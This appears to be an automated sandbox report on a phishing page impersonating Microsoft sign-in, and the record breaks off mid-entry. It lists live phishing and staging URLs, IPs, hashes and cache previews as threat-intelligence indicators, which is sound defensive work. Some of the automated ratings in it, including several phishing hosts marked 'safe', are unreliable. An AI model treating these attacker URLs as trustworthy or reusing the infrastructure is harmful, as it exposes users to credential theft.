https://a.nel.cloudflare.com/report/v4?s=QcBOsfsYs8PeYUCrKZ2Y9gYZGlIy2rfxNsPqrvrhLDPYQVwXL7h7QpSUTdFShD9ScIbhUZ%2B2yLOTDGIi2rnUall0A8LAMTfpMtaktOvzCYw0x0BvbR9TuUjPW1iBtEvb7H9nsVRO6RAlpW94Q8BS9VvltZt7k9U7r%2BDoFZ1QxvsNf9qAgTXs0y9rWXMDONa8WSAjQjpp	0%	Avira URL Cloud	safe
https://fetchlnk.truesharingzone.site/get.php	0%	Avira URL Cloud	safe
https://basicplan.filesdistributorin.online/ready-page.php	0%	Avira URL Cloud	safe
https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/favicon.ico	100%	Avira URL Cloud	phishing
https://collector-pxzc5j78di.hsprotect.net/api/v2/msft	0%	Avira URL Cloud	safe
https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/favicon.ico	100%	Avira URL Cloud	phishing
https://fetchlnk.truesharingzone.site/get.php	1%	Virustotal		Browse
https://client.hsprotect.net/PXzC5j78di/main.min.js	0%	Avira URL Cloud	safe
https://login.windows-ppe.net	0%	Avira URL Cloud	safe
https://fpt.live.com/	0%	Avira URL Cloud	safe
blob:https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/694e13db-ccb0-49ee-90aa-9a2d7f0a11af	0%	Avira URL Cloud	safe
https://basicplan.filesdistributorin.online/ready-page.php	1%	Virustotal		Browse
https://login.windows-ppe.net	2%	Virustotal		Browse
https://stk.hsprotect.net/ns?c=0d95f950-67ec-11ef-8c21-4b98fcd4657e	0%	Avira URL Cloud	safe
https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/890f5e421912d83086e5dcc2/86b1d9943b8c18420153e7?c69r153=itqf80n&8ls1t3xz=e96619c0f41e457dc67526ff68a2&5tw8bsx7e=87dc22878e019397c649b8	100%	Avira URL Cloud	phishing
https://theextrenalfiles.filesdistributorin.online/thegifloader/loading.gif	0%	Avira URL Cloud	safe
https://client.hsprotect.net/PXzC5j78di/main.min.js	0%	Virustotal		Browse
https://fpt.live.com/	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s-part-0016.t-0009.t-msedge.net	13.107.246.44	true	false	0%, Virustotal, Browse	unknown
a.nel.cloudflare.com	35.190.80.1	true	false	0%, Virustotal, Browse	unknown
theextrenalfiles.filesdistributorin.online	162.254.39.141	true	false		unknown
palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev	172.66.47.41	true	true	0%, Virustotal, Browse	unknown
sni1gl.wpc.alphacdn.net	152.199.21.175	true	false	0%, Virustotal, Browse	unknown
fetchlnk.truesharingzone.site	162.254.39.141	true	false	12%, Virustotal, Browse	unknown
s-part-0039.t-0009.t-msedge.net	13.107.246.67	true	false	0%, Virustotal, Browse	unknown
s-part-0045.t-0009.t-msedge.net	13.107.246.73	true	false	0%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown
s-part-0014.t-0009.t-msedge.net	13.107.246.42	true	false	0%, Virustotal, Browse	unknown
bg.microsoft.map.fastly.net	199.232.210.172	true	false	0%, Virustotal, Browse	unknown
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.57.40	true	false	0%, Virustotal, Browse	unknown
inbound-weighted.protechts.net	35.190.10.96	true	false	0%, Virustotal, Browse	unknown
bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev	172.66.47.137	true	false	12%, Virustotal, Browse	unknown
www.google.com	142.250.186.132	true	false	0%, Virustotal, Browse	unknown
stk.hsprotect.net	34.107.199.61	true	false	0%, Virustotal, Browse	unknown
basicplan.filesdistributorin.online	162.254.39.141	true	false	2%, Virustotal, Browse	unknown
s-part-0032.t-0009.t-msedge.net	13.107.246.60	true	false	0%, Virustotal, Browse	unknown
signup.live.com	unknown	unknown	false	0%, Virustotal, Browse	unknown
collector-pxzc5j78di.hsprotect.net	unknown	unknown	false	0%, Virustotal, Browse	unknown
logincdn.msftauth.net	unknown	unknown	false	0%, Virustotal, Browse	unknown
client.hsprotect.net	unknown	unknown	false	0%, Virustotal, Browse	unknown
msft.hsprotect.net	unknown	unknown	false	0%, Virustotal, Browse	unknown
fpt.live.com	unknown	unknown	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://a.nel.cloudflare.com/report/v4?s=QcBOsfsYs8PeYUCrKZ2Y9gYZGlIy2rfxNsPqrvrhLDPYQVwXL7h7QpSUTdFShD9ScIbhUZ%2B2yLOTDGIi2rnUall0A8LAMTfpMtaktOvzCYw0x0BvbR9TuUjPW1iBtEvb7H9nsVRO6RAlpW94Q8BS9VvltZt7k9U7r%2BDoFZ1QxvsNf9qAgTXs0y9rWXMDONa8WSAjQjpp	false	Avira URL Cloud: safe	unknown
https://fetchlnk.truesharingzone.site/get.php	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/890f5e421912d83086e5dcc2/86b1d9943b8c18420153e7/?c69r153=itqf80n&8ls1t3xz=e96619c0f41e457dc67526ff68a2&5tw8bsx7e=87dc22878e019397c649b8	false		unknown
https://basicplan.filesdistributorin.online/ready-page.php	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/favicon.ico	false	Avira URL Cloud: phishing	unknown
https://collector-pxzc5j78di.hsprotect.net/api/v2/msft	false	Avira URL Cloud: safe	unknown
https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/favicon.ico	true	Avira URL Cloud: phishing	unknown
blob:https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/694e13db-ccb0-49ee-90aa-9a2d7f0a11af	true	Avira URL Cloud: safe	unknown
https://stk.hsprotect.net/ns?c=0d95f950-67ec-11ef-8c21-4b98fcd4657e	false	Avira URL Cloud: safe	unknown
https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/890f5e421912d83086e5dcc2/86b1d9943b8c18420153e7?c69r153=itqf80n&8ls1t3xz=e96619c0f41e457dc67526ff68a2&5tw8bsx7e=87dc22878e019397c649b8	false	Avira URL Cloud: phishing	unknown
https://theextrenalfiles.filesdistributorin.online/thegifloader/loading.gif	false	Avira URL Cloud: safe	unknown
https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://login.microsoftonline.com	chromecache_176.2.dr	false	URL Reputation: safe	unknown
https://client.hsprotect.net/PXzC5j78di/main.min.js	chromecache_172.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://login.windows-ppe.net	chromecache_176.2.dr	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://fpt.live.com/	chromecache_142.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
13.107.246.42	s-part-0014.t-0009.t-msedge.net	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
162.254.39.141	theextrenalfiles.filesdistributorin.online	United States		13768	COGECO-PEER1CA	false
35.190.10.96	inbound-weighted.protechts.net	United States		15169	GOOGLEUS	false
13.107.246.44	s-part-0016.t-0009.t-msedge.net	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.246.60	s-part-0032.t-0009.t-msedge.net	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.186.132	www.google.com	United States		15169	GOOGLEUS	false
35.190.80.1	a.nel.cloudflare.com	United States		15169	GOOGLEUS	false
34.107.199.61	stk.hsprotect.net	United States		15169	GOOGLEUS	false
13.107.246.73	s-part-0045.t-0009.t-msedge.net	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.66.47.41	palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev	United States		13335	CLOUDFLARENETUS	true
239.255.255.250	unknown	Reserved		unknown	unknown	false
172.66.47.137	bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev	United States		13335	CLOUDFLARENETUS	false
152.199.21.175	sni1gl.wpc.alphacdn.net	United States		15133	EDGECASTUS	false

Private

IP
192.168.2.6
192.168.2.5

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1502357
Start date and time:	2024-09-01 00:53:36 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.win@25/79@46/15
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Browse: https://login.live.com/oauth20_authorize.srf?response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&scope=openid+profile+email+offline_access&response_mode=form_post&redirect_uri=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2ffederation%2foauth2&state=rQIIAYWSO2_TUABG47QNtOItBsSAOjAgkNPre_2IIyHhxEmTJo7zsOvYi2UnfuVhp44dOxETLAxIMHeDASFgQiAhJuZKSGwgFlbEhBADGxT-AMsZvjN-Z-sEnafzIA-urxF5oniVRCRlMCaLswaNcJIlAG6QkMYRhWgEATGkAAovbJ3r3Ln3-vaNj7ful35-enD594tDbFOfeAsrPwimz7ArbhTN5sWdnSRJ8oFte4N_Ymdi-EPPd95g2AcM-4phh9kNy8fl3rPsnEYMoliaoQjAQAhZAPOaJKQqFBJR4iJ1KhCaB4CqqGlTqRxv9UjY7U4E2IHirjbV-EEiKDJqKfVUU4RIHe176hIAUVGXTclJRd6JBF6AmqQSrdE4EVZ19Dl7VuTiyIV_EYTeyvqR3bSDcKrPgnl0uPY8u-rOO6bqr6yewFMsQxpdvxFynE60XbO7X476HjoQpm7VWUbGEmdDhtGjJVUd9GtKXA_50N3nwiBI-0bS7uEHtNlolFtjRE8WNrk7phdWrU3ynGkoiRn4U9mMyWadcZqGw1eVAy2lR31aTkVN1r1-OeCFg2QRJAnpkIzKOMG8AyaVVVreowg9xR2Zr01hEzfnfBssxwHuV0BvIboDJwVwUGuMQ8ZxZcEsN1m9MEQFX5NGQ6XJeWy1W2qD0mxhU4G9VyposYuq3WTVUHflhSXLZivq-a4y5-KJgNdQFDsMO7SYZm1UsyS0KnE62ZMKtPNyLXf88DTwj9bOBDPL94bbszCwvYn1YR37tn7qZO5c7lJmO3PtIjjzax17vHEc0dP3XzbY5ZPy3UekHcmvMkcbOyq_Qou-VQFSTE3SAjKBMqLL7mxPrcRLUYyHHdZGzn4dAO4mUSQe5rCHudxR7nyd11sVqSdxLZ7r8lAH33PYvROZt5v_SfHz1kUIIMABixPMNgRFgihSQHt3OvMH0&estsfed=1&uaid=b58882512b7c40d78c42f4d88f1affac&signup=1&lw=1&fl=easi2&fci=4345a7b9-9a63-4910-a426-35363201d503&mkt=en-US

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.35, 216.58.206.46, 74.125.133.84, 34.104.35.123, 142.250.184.202, 216.58.206.42, 142.250.186.106, 20.190.159.23, 20.190.159.75, 20.190.159.68, 40.126.31.67, 20.190.159.2, 20.190.159.64, 40.126.31.73, 40.126.31.71, 40.68.123.157, 192.229.221.95, 20.242.39.171, 199.232.210.172, 20.190.159.4, 20.190.159.0, 40.126.31.69, 13.107.42.22, 13.85.23.206, 52.167.30.171, 216.58.212.138, 142.250.185.106, 172.217.23.106, 142.250.185.234, 142.250.185.170, 142.250.186.170, 142.250.185.138, 142.250.186.74, 142.250.186.42, 142.250.185.74, 142.250.181.234, 142.250.74.202, 172.217.18.10, 142.250.185.202, 142.250.184.234, 2.23.209.55, 2.23.209.54, 20.42.65.93, 88.221.110.106, 2.16.100.168, 52.168.117.174, 172.217.16.195, 217.20.57.40
Excluded domains from analysis (whitelisted): greenid-prod-pme.eastus2.cloudapp.azure.com, lgincdnmsftuswe2.azureedge.net, pme-greenid-prod.trafficmanager.net, slscr.update.microsoft.com, clientservices.googleapis.com, browser.events.data.trafficmanager.net, a767.dspw65.akamai.net, clients2.google.com, ocsp.digicert.com, login.live.com, update.googleapis.com, wu-b-net.trafficmanager.net, fpt2.microsoft.com, fs.microsoft.com, acctcdnmsftuswe2.azureedge.net, content-autofill.googleapis.com, ajax.googleapis.com, aadcdnoriginwus2.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, lgincdnvzeuno.ec.azureedge.net, aadcdn.msauth.net, edgedl.me.gvt1.com, e177902.dscd.akamaiedge.net, account.msa.akadns6.net, aadcdnoriginwus2.afd.azureedge.net, account.msa.msidentity.com, clients.l.google.com, fpt.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net, logincdn.msauth.net, onedscolprdeus20.eastus.cloudapp.azure.com, acctcdn.msauth.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

⊘No simulations

LLM Input / Output

Input	Output
URL: blob:https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/694e13db-ccb0-49ee-90aa-9a2d7f0a11af Model: jbxai	{ "brand":["Microsoft"], "contains_trigger_text":false, "prominent_button_name":"Next", "text_input_field_labels":["Email, phone, or Skype", "No account? Create one!"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://signup.live.com/signup?sru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26mkt%3den-US%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26opid%3d9F8019300768C2D0%26opidt%3d1725144893%26uaid%3db58882512b7c40d78c42f4d88f1affac%2 Model: jbxai	{ "brand":["Microsoft"], "contains_trigger_text":false, "prominent_button_name":"Next", "text_input_field_labels":["someone@example.com", "Get a new email address"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://signup.live.com/signup?sru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1033%26mkt%3den-US%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26opid%3d9F8019300768C2D0%26opidt%3d1725144893%26uaid%3db58882512b7c40d78c42f4d88f1affac%2 Model: jbxai	{ "phishing_score":0, "brand_name":"Microsoft", "reasons":"The domain and brand association are legitimate, and the minimalistic design and user-friendly interface suggest a genuine Microsoft sign-up page."}

URL: blob:https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/694e13db-ccb0-49ee-90aa-9a2d7f0a11af Model: jbxai	{ "phishing_score":8, "brand_name":"Microsoft", "reasons":"The domain name 'palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev' does not match the brand name Microsoft, and the.dev top-level domain is not commonly associated with Microsoft. The unusual domain name and top-level domain increase the likelihood of this being a phishing site."}

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

Chrome Cache Entry: 130

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
Category:	dropped
Size (bytes):	1435
Entropy (8bit):	7.8613342322590265
Encrypted:	false
SSDEEP:	24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
MD5:	9F368BC4580FED907775F31C6B26D6CF
SHA1:	E393A40B3E337F43057EEE3DE189F197AB056451
SHA-256:	7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
SHA-512:	0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
Malicious:	false
Reputation:	low
Preview:	...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.\|..~.\|{~...b{8...zv.....8\|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.\|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dgN.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f;.....Zhrr.,.U....6.Y....+Zd.R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

Chrome Cache Entry: 131

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
Category:	downloaded
Size (bytes):	1435
Entropy (8bit):	7.8613342322590265
Encrypted:	false
SSDEEP:	24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
MD5:	9F368BC4580FED907775F31C6B26D6CF
SHA1:	E393A40B3E337F43057EEE3DE189F197AB056451
SHA-256:	7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
SHA-512:	0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
Malicious:	false
Reputation:	low
URL:	https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg
Preview:	...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.\|..~.\|{~...b{8...zv.....8\|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.\|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dgN.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f;.....Zhrr.,.U....6.Y....+Zd.R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

Chrome Cache Entry: 132

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	20
Entropy (8bit):	3.646439344671015
Encrypted:	false
SSDEEP:	3:xRhVnCm:xrQm
MD5:	F79FFC1767406D43B996B050CEC09ED2
SHA1:	EA4F919251BCDE6EE3CB2E45C0356E1FA3B86661
SHA-256:	1E62D5B3EFE0ECE892FF79BD65457FF2DC48A840444AFD53DEEDF2F2869BD685
SHA-512:	1B4C7C09D52BB2D26F505C148FD92B987AD680E675E7496EB8E92279F750587EBCE45DECD718CBBDFB91A4CEAADCA14AD918C4F8AA7971D199593C82C31BB92F
Malicious:	false
Reputation:	low
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAnAwrJpDUzjsBIFDdbBmF8=?alt=proto
Preview:	Cg0KCw3WwZhfGgQIZBgC

Chrome Cache Entry: 133

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
Category:	downloaded
Size (bytes):	1435
Entropy (8bit):	7.8613342322590265
Encrypted:	false
SSDEEP:	24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
MD5:	9F368BC4580FED907775F31C6B26D6CF
SHA1:	E393A40B3E337F43057EEE3DE189F197AB056451
SHA-256:	7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
SHA-512:	0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
Malicious:	false
Reputation:	low
URL:	https://logincdn.msauth.net/shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg
Preview:	...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.\|..~.\|{~...b{8...zv.....8\|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.\|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dgN.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f;.....Zhrr.,.U....6.Y....+Zd.R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

Chrome Cache Entry: 134

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	low
URL:	https://acctcdn.msauth.net/images/favicon.ico?v=2
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 135

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65402)
Category:	downloaded
Size (bytes):	155101
Entropy (8bit):	5.673242491471087
Encrypted:	false
SSDEEP:	3072:B4bBfYPY3LKdHJUksyKILwQ5IYxJwJhTDrdZKlf0H0:B4RkY3kJBk2JafrdZKlfH
MD5:	3403221E2A71871CE02AAA367B5C4748
SHA1:	4C831711DDEF2D4676147434C11D6337735EAC03
SHA-256:	6099149817D46ECA1784C18660E807F192CB369FCE2FD571A944289FF3194139
SHA-512:	EB6EF2F02B89D39E6867E67AFB6B3426F4DCFAA07F7D67EA7FE6DF1E7E7F3CE6DA0BDD61FD416BDD7AD86C09E10285A3D5D14DFCC647C13FED96BE780BA71F10
Malicious:	false
Reputation:	low
URL:	https://client.hsprotect.net/PXzC5j78di/main.min.js
Preview:	// @license Copyright (C) 2014-2024 PerimeterX, Inc (www.perimeterx.com). Content of this file can not be copied and/or distributed..try{window._pxAppId="PXzC5j78di",function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){(null==e\|\|e>t.length)&&(e=t.length);for(var n=0,r=new Array(e);n<e;n++)r[n]=t[n];return r}function n(t,n){if(t){if("string"==typeof t)return e(t,n);var r=Object.prototype.toString.call(t).slice(8,-1);return"Object"===r&&t.constructor&&(r=t.constructor.name),"Map"===r\|\|"Set"===r?Array.from(t):"Arguments"===r\|\|/^(?:Ui\|I)nt(?:8\|16\|32)(?:Clamped)?Array$/.test(r)?e(t,n):void 0}}function r(t){return function(t){if(Array.isArray(t))return e(t)}(t)\|\|function(t){if("undefined"!=typeof Symbol&&null!=t[Symbol.iterator]\|\|null!=t["@@iterator"])return Array.from(t)}(t)\|\|

Chrome Cache Entry: 136

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 900
Category:	downloaded
Size (bytes):	252
Entropy (8bit):	7.057986237150363
Encrypted:	false
SSDEEP:	6:Xth1WIxjFLw0cb88da94jE0CadKSPfN8IC6a8r0ADAgvw9xwi:Xf1WMlcb5a92EGZa6JmUUxh
MD5:	19AA49E6F345811CEBE895003C8FCFC7
SHA1:	48D93BEDEFFE842A3DFB5D3036D14178D97115F9
SHA-256:	F61DC276446B263FC29B1A8CE20D8BFD2C028F4603356F795687B942E3B4969F
SHA-512:	6A2E4E29D0FDBFD0E671A88CB6411AA7401524C3DDF903AB8E766B4CD66C9C31E0D175592920D29D3CF0CD67D6FA6763F6A0D4A5286EEC48F77028A36054E642
Malicious:	false
Reputation:	low
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/ellipsis_635a63d500a92a0b8497cdc58d0f66b1.svg
Preview:	...........S.. ...q.cl.&...}.....1..Uj?.jR..&......8..h.G....jl..n8.!.P...+....Fa8x[c.0...[?..........'n....kZ.:...w..z..5..&dA.+..1h2".!..R1(.t..SJ.N+......VV._...y.D_..3"4...e;. ]RA...r..VR-..I..DO.9Y...a{A\&.xr{.H.K\...f.?.7&}..........

Chrome Cache Entry: 137

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	244
Entropy (8bit):	3.9795507315013943
Encrypted:	false
SSDEEP:	6:QcCoWFoqW4353Q5D2IDKpWAmWReGISKvWHtvQM6Uq4VrEQ6cGOC4:JO2o3ED2IgWZJGvgsv7E8GOC4
MD5:	1C3844C6413FEC85F1D9EF341F83A30F
